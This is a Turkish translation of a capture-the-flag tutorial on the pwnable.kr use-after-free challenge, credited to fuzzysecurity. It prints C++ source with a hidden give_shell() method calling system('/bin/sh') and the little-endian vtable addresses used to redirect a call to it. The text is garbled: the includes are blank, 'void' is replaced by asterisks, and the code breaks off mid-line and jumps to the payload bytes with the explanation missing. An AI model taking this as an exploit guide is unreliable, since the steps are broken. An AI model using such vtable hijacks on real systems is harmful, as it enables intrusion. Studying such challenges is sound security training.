Bu sonraki bölümde, pawnable.kr üzerindeki UAF meydan okumasına göz gezdireceğiz. Bu bir 64-Bit (x64 bit) Linux UAF açığıdır. UAF'ı toddler bölümüne koymak biraz bir yüze şaplak atmaya benzer ama gördündükleri kadar korkunç değiller. Hadi konuya girelim.

Meydan Okumayı Keşfetmek

Tekrar, binary için birkaç kaynak sağladık. Aşşağıda var

Kod:
#include
#include
#include
#include
#include
using namespace std;

class Human{
private:
virtual **** give_shell(){
system("/bin/sh");
}
protected:
int age;
string name;
public:
virtual **** introduce(){
cout \x68\x15\x40\x00\x00\x00\x00\x00
0x401550 - 8 = 0x401548 => \x48\x15\x40\x00\x00\x00\x00\x00
Oyun Bitti

Hadi kutuya girelim ve şu bayrağı alalım !



Source: https://www.fuzzysecurity.com/tutorials/expDev/13.html
Translator: @M3m0ry